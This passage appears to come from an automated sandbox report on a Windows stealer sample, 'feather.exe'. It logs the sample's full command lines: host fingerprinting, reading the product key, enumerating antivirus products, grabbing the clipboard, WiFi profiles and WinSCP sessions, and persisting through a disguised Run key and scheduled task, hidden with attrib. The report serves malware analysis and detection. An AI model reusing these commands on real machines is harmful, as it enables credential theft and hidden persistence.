| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1968 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2044 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1804 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\more.com
more +1
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=1804 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "function Get-AntiVirusProduct {
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f
C:\Windows\system32\cmd.exe
cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
C:\Windows\system32\schtasks.exe
schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""
C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe
